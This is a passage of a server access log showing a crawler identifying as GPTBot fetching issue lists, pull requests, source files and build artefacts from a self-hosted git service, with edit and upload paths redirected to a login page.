+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=all&type=all" +[17/Feb/2026:17:42:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:17:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/.vscode" [Client 74.7.227.38] [Length 10371] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:17:42:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp?display=source" [Client 74.7.227.38] [Length 12033] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" +[17/Feb/2026:17:42:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:17:42:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10086] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10" [Client 74.7.227.38] [Length 94698] [Gzip 15.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:42:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11160] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:42:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" +[17/Feb/2026:17:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:17:42:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:17:42:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode" +[17/Feb/2026:17:42:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/.vscode" +[17/Feb/2026:17:42:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode" +[17/Feb/2026:17:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/.vscode" +[17/Feb/2026:17:42:46 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode" +[17/Feb/2026:17:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/.vscode" +[17/Feb/2026:17:42:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 11766] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode" +[17/Feb/2026:17:42:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/.vscode" [Client 74.7.227.38] [Length 9814] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode" +[17/Feb/2026:17:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version?display=source" [Client 74.7.227.38] [Length 11201] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/.python-version" +[17/Feb/2026:17:42:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt?display=source" [Client 74.7.227.38] [Length 12315] [Gzip 3.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/env.example.txt" +[17/Feb/2026:17:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json?display=rendered" [Client 74.7.227.38] [Length 11027] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:17:42:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" +[17/Feb/2026:17:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx?display=source" [Client 74.7.227.38] [Length 11666] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" +[17/Feb/2026:17:42:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 11552] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj" +[17/Feb/2026:17:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12037] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:42:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:17:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12062] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:42:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json?display=rendered" [Client 74.7.227.38] [Length 11204] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 329] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:42:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 10982] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 9833] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:42:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 1004] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:42:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:17:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12063] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:42:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 11546] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:42:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:42:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:42:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:42:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:42:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 11792] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug" [Client 74.7.227.38] [Length 10097] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:42:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0" [Client 74.7.227.38] [Length 9822] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.FileListAbsolute.txt" [Client 74.7.227.38] [Length 11475] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:43:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GlobalUsings.g.cs" [Client 74.7.227.38] [Length 11589] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 11339] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0" +[17/Feb/2026:17:43:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12062] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:17:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 9894] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 10571] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:43:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 10916] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 